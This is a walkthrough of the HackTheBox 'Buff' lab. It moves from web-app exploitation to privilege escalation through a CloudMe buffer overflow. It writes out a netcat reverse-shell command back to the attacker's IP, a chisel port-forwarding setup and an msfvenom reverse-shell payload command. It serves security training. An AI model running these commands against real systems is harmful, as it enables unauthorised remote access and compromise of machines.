Hackthebox Buff walkthrough
Enumeration
Let's begin by scanning with Nmap.
Two ports are open: 8080 and 7680.
After opening the web app on port 8080 I found that it's built from a projectworlds.in project.
I searched for the project and found it here:
https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/
I searched for a public exploit for the project and found this exploit:
Exploiting
Python script
We got in!
Let's upload nc.exe through the same upload directory.
Let's get our reverse shell. A netcat listener is already waiting on port 1234 on my machine (10.10.10.10 in this command):
C:\xampp\htdocs\gym\upload> powershell -c ".\nc.exe 10.10.10.10 1234 -e powershell"
We got a shell as SHAUN! Let's get the user flag.
USER flag!
Privilege Escalation
I uploaded WinPEAS.exe and, after running it, found a vulnerable app called Cloudme.exe listening on port 8888. It is only reachable from the box itself, which is why we need port forwarding below.
I searched for an exploit and found these:
We need port forwarding to run the exploit; you can use chisel or plink.
chisel has to be compiled to an .exe to run on Windows; I used Go. You can compile it with this command:
env GOOS=windows GOARCH=amd64 go build -o chisel-x64.exe -ldflags "-s -w"
After compiling it to an exe, let's upload it.
I started the chisel server on port 8080 on my machine.
Then we need to start the chisel client on the victim machine so it connects back and forwards port 8888 to us.
Exploiting Cloudme
We need to adjust the msfvenom command so the shell comes back to our machine.
Copy this and change LHOST (and LPORT if you want) to your own IP address to get your shell. The -b option excludes the bytes that would break the overflow, and -f python prints the shellcode as a Python buffer ready to paste into the exploit:
msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
Run your listener on the port you chose in the payload, then run the exploit.